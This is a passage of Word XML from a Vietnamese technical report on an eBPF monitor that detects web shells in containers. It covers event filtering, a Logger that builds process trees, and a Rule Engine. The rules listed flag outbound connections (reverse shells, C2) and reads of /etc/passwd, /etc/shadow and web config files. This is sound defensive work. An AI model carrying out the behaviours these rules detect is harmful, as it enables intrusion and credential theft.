                <v:rect id="Shape 143" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:2690025;top:4833863;height:619200;width:1624200;v-text-anchor:middle;" fillcolor="#CFE2F3" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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0I7nK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4"/>
                            <w:szCs w:val="24"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                            <w:b w:val="0"/>
                            <w:i w:val="0"/>
                            <w:smallCaps w:val="0"/>
                            <w:strike w:val="0"/>
                            <w:color w:val="000000"/>
                            <w:sz w:val="24"/>
                            <w:szCs w:val="24"/>
                            <w:vertAlign w:val="baseline"/>
                          </w:rPr>
                          <w:t>Logger</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="32" type="#_x0000_t32" style="position:absolute;left:3502125;top:802050;height:598800;width:0;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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HJf6q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endarrow="block"/>
                  <v:imagedata o:title=""/>
                  <o:lock v:ext="edit" aspectratio="f"/>
                </v:shape>
                <v:shape id="Shape 145" o:spid="_x0000_s1026" o:spt="202" type="#_x0000_t202" style="position:absolute;left:3613912;top:928937;height:457606;width:1258638;" filled="f" stroked="f" coordsize="21600,21600" o:gfxdata="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euSO9L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Có sự kiện</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="32" type="#_x0000_t32" style="position:absolute;left:3502125;top:2020050;height:439500;width:0;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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dE087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3502125;top:3251350;height:439500;width:0;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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twdFM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3502125;top:4310063;height:523800;width:0;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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jZUM9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f" focussize="0,0"/>
                  <v:stroke color="#000000" joinstyle="round" endarrow="block"/>
                  <v:imagedata o:title=""/>
                  <o:lock v:ext="edit" aspectratio="f"/>
                </v:shape>
                <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="32" type="#_x0000_t32" style="position:absolute;left:1941535;top:2857541;flip:x y;height:1902;width:489615;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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dBgrm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color="#000000" joinstyle="round" endarrow="block"/>
                  <v:imagedata o:title=""/>
                  <o:lock v:ext="edit" aspectratio="f"/>
                </v:shape>
                <v:shape id="Shape 150" o:spid="_x0000_s1026" o:spt="202" type="#_x0000_t202" style="position:absolute;left:2002449;top:2440993;height:457606;width:700581;" filled="f" stroked="f" coordsize="21600,21600" o:gfxdata="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Sai</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:shape id="Shape 151" o:spid="_x0000_s1026" o:spt="202" type="#_x0000_t202" style="position:absolute;left:3010880;top:3229008;height:457606;width:700581;" filled="f" stroked="f" coordsize="21600,21600" o:gfxdata="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gAYeK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4"/>
                            <w:szCs w:val="24"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                            <w:b w:val="0"/>
                            <w:i w:val="0"/>
                            <w:smallCaps w:val="0"/>
                            <w:strike w:val="0"/>
                            <w:color w:val="000000"/>
                            <w:sz w:val="24"/>
                            <w:szCs w:val="24"/>
                            <w:vertAlign w:val="baseline"/>
                          </w:rPr>
                          <w:t>Đúng</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
                          <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                          <w:jc w:val="left"/>
                          <w:rPr>
                            <w:sz w:val="24"/>
                            <w:szCs w:val="24"/>
                          </w:rPr>
                        </w:pPr>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="none"/>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>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4</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkStart w:id="56" w:name="_Toc769230564"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>: Lưu đồ thu thập và chuẩn hóa dữ liệu</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sau khi chương trình eBPF ghi dữ liệu vào Perf Buffer, các Monitor trong User space sẽ liên tục theo dõi và nhận các sự kiện phát sinh từ Kernel. Trước khi đưa vào xử lý, hệ thống thực hiện một số bước cơ bản nhằm loại bỏ các sự kiện không thuộc phạm vi giám sát: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Lọc theo Container: các tiến trình sinh ra từ container sẽ được theo dõi, vì web server được đóng gói bên trong container. Việc theo dõi container này dựa vào 1 tính chất đặc biệt của Linux, đó là theo dõi cgroup id, các tiến trình có cùng 1 chính sách sử dụng tài nguyên sẽ có cùng cgroup id.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0"/>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Ignored pid: đầy là danh sách các pid có thể bỏ qua do người vận hành thêm vào, vì có những tiến trình lặp đi lặp lại liên tục nên được cấp cùng 1 pid, từ đó có thể bỏ qua các tiến trình này để giảm độ phức tạp cho việc theo dõi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Sau khi lọc các gói tin thì sẽ đến chuẩn hóa dữ liệu thành 1 chuẩn gồm các thông tin: time, event_type, container, pid, ppid, tgid, process name và detail. Dữ liệu được chuẩn hóa sẽ được đưa vào trung tâm phân phối dữ liệu Logger</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_heading=h.j6cbl7vtsymk" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="57"/>
      <w:bookmarkStart w:id="58" w:name="_Toc21125303"/>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Logger</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
                <wp:extent cx="4286250" cy="3409950"/>
                <wp:effectExtent l="25400" t="25400" r="25400" b="25400"/>
                <wp:docPr id="101" name="Group 101"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="239250" y="722175"/>
                          <a:ext cx="4286250" cy="3409950"/>
                          <a:chOff x="239250" y="722175"/>
                          <a:chExt cx="4273150" cy="3399950"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="124" name="Shape 124"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="244025" y="2177425"/>
                            <a:ext cx="1685100" cy="4974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Logger</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="125" name="Shape 125"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2822525" y="726950"/>
                            <a:ext cx="1685100" cy="4974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Dashboard</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="126" name="Shape 126"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2822525" y="2726675"/>
                            <a:ext cx="1685100" cy="4974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Rule Engine</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="127" name="Shape 127"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2822525" y="3619950"/>
                            <a:ext cx="1685100" cy="4974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Lưu trữ</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="128" name="Shape 128"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2822525" y="1605000"/>
                            <a:ext cx="1685100" cy="4974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Process cache</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="104" name="Straight Arrow Connector 104"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2334725" y="974500"/>
                            <a:ext cx="10200" cy="29133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 name="Straight Arrow Connector 105"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm rot="10800000" flipH="1">
                            <a:off x="2334725" y="975650"/>
                            <a:ext cx="487800" cy="90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6" name="Straight Arrow Connector 106"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2324525" y="1847400"/>
                            <a:ext cx="498000" cy="6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7" name="Straight Arrow Connector 107"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2344925" y="2974175"/>
                            <a:ext cx="477600" cy="12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8" name="Straight Arrow Connector 108"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2344925" y="3867450"/>
                            <a:ext cx="477600" cy="12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09" name="Straight Arrow Connector 109"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1929125" y="2426125"/>
                            <a:ext cx="415800" cy="102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268.5pt;width:337.5pt;" coordorigin="239250,722175" coordsize="4273150,3399950" o:gfxdata="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">
                <o:lock v:ext="edit" aspectratio="f"/>
                <v:rect id="Shape 124" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:244025;top:2177425;height:497400;width:1685100;v-text-anchor:middle;" fillcolor="#CFE2F3" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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8+k6a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Logger</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Shape 125" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:2822525;top:726950;height:497400;width:1685100;v-text-anchor:middle;" fillcolor="#CFE2F3" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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AByNj2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Dashboard</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Shape 126" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:2822525;top:2726675;height:497400;width:1685100;v-text-anchor:middle;" fillcolor="#CFE2F3" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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CgqEq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Rule Engine</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Shape 127" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:2822525;top:3619950;height:497400;width:1685100;v-text-anchor:middle;" fillcolor="#CFE2F3" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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J/sDdG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Lưu trữ</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Shape 128" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:2822525;top:1605000;height:497400;width:1685100;v-text-anchor:middle;" fillcolor="#CFE2F3" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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uc5mj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pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                            <w:b w:val="0"/>
                            <w:i w:val="0"/>
                            <w:smallCaps w:val="0"/>
                            <w:strike w:val="0"/>
                            <w:color w:val="000000"/>
                            <w:sz w:val="28"/>
                            <w:vertAlign w:val="baseline"/>
                          </w:rPr>
                          <w:t>Process cache</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="32" type="#_x0000_t32" style="position:absolute;left:2334725;top:974500;height:2913300;width:10200;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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D94N/66AAAA3A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fill on="f" focussize="0,0"/>
                  <v:stroke color="#000000" joinstyle="round"/>
                  <v:imagedata o:title=""/>
                  <o:lock v:ext="edit" aspectratio="f"/>
                </v:shape>
                <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="32" type="#_x0000_t32" style="position:absolute;left:2334725;top:975650;flip:x;height:9000;width:487800;rotation:11796480f;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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Ds5HIV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endarrow="block"/>
                  <v:imagedata o:title=""/>
                  <o:lock v:ext="edit" aspectratio="f"/>
                </v:shape>
                <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="32" type="#_x0000_t32" style="position:absolute;left:2324525;top:1847400;height:6300;width:498000;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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Ktn04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2344925;top:2974175;height:1200;width:477600;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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RZVRe7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2344925;top:3867450;height:1200;width:477600;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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NArFC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color="#000000" joinstyle="round" endarrow="block"/>
                  <v:imagedata o:title=""/>
                  <o:lock v:ext="edit" aspectratio="f"/>
                </v:shape>
                <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="32" type="#_x0000_t32" style="position:absolute;left:1929125;top:2426125;height:10200;width:415800;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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0XmYYL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v:imagedata o:title=""/>
                  <o:lock v:ext="edit" aspectratio="f"/>
                </v:shape>
                <w10:wrap type="none"/>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>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5</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkStart w:id="59" w:name="_Toc1032018834"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>: lưu đồ xử lý của Logger</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Logger là thành phần trung tâm của hệ thống, chịu trách nhiệm tiếp nhận các sự kiện đã được chuẩn hóa từ các Monitor và phân phối dữ liệu đến các thành phần xử lý khác nhau. Ngoài chức năng lưu trữ nhật ký, Logger còn thực hiện việc gán định danh cho sự kiện, xây dựng mối quan hệ giữa các tiến trình và đồng bộ dữ liệu cho toàn bộ hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Khi một sự kiện được gửi đến Logger, hệ thống sẽ thực hiện các bước xử lý:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Sinh event ID: vì pid hoàn toàn có thể được tái sử dụng nên cần phải có event id để xác định duy nhất 1 tiến trình. Bộ đếm Event ID được lưu trong một tệp cấu hình riêng và được cập nhật mỗi khi có sự kiện mới.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Xác định parent event ID: Để xác định mối quan hệ giữa các tiến trình, Logger duy trì một hàng đợi (Queue) lưu ánh xạ giữa PID và Event ID của các sự kiện đã xử lý. Khi một sự kiện mới được tiếp nhận, hệ thống sử dụng PPID của tiến trình để tra cứu trong Queue. Nếu tìm thấy tiến trình cha, Logger sẽ gán Parent Event ID tương ứng cho sự kiện hiện tại. Thông tin này là cơ sở để truy vết và xây dựng cây tiến trình (Process Tree).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Lưu trữ nhật ký: Sau khi hoàn tất việc gán định danh, Logger ghi sự kiện vào tệp nhật ký dưới dạng thống nhất nhằm phục vụ việc truy vết và phân tích sau này.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Phân phối dữ liệu: Logger đóng vai trò trung tâm phân phối dữ liệu của hệ thống, các sự kiện được xử lý sẽ được gửi đồng thời đến nhiều thành phần khác nhau:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1680" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Dashboard: thông qua hàng đợi để hiển thị theo thời gian thực.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1680" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Rule Engine: để đối chiếu với tập luật và sinh cảnh báo nếu phát hiện bất thường</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1680" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Cập nhật Process Cache nhằm lưu trữ thông tin các tiến trình phục vụ việc truy vấn và xây dựng Process Tree</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1680" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Gửi dữ liệu đến Rule Engine để thực hiện đánh giá sinh Alert</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="_heading=h.6p7yolvas8mx" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="60"/>
      <w:bookmarkStart w:id="61" w:name="_Toc1775560227"/>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Rule Engine</w:t>
      </w:r>
      <w:bookmarkEnd w:id="61"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Rule Engine là thành phần chịu trách nhiệm phân tích các sự kiện do Logger chuyển đến nhằm phát hiện các hành vi có dấu hiệu bất thường, đánh giá sự kiện dựa trên tập luật được định nghĩa trước.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Mỗi sự kiện được truyền qua Rule Engine sẽ lần lượt được đối chiếu với các nhóm luật tương ứng. Các luật xây dựng dưới dạng tệp JSON nhằm tách biệt dữ liệu cấu hình khỏi mã nguồn chương trình, giúp việc bổ sung chỉnh sửa các luật phát hiện trở nên đơn giản mà không cần thay đổi mã nguồn của hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Rule Engine hiện tại triển khai ba nhóm luật chính:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Connect rule: cảnh báo mọi hành vi tạo kết nối ra bên ngoài, vì tính chất nguy hiểm của hành vi tạo kết nối ra bên ngoài. Trong bối cảnh web shell, việc thiết lập kết nối ra bên ngoài thường là bước cuối cùng để thực hiện các hành vi như Reverse Shell, tải mã độc, truyền dữ liệu hoặc giao tiếp với máy chủ điều khiển (C2).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>File rule: cảnh báo khi truy cập các file nhạy cảm như /etc/passwd, /etc/shadow, các file config của web,... những hành vi này thường xuất hiện trong giai đoạn thu thập thông tin hoặc đánh cắp dữ liệu sau khi khai thác thành công web shell.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
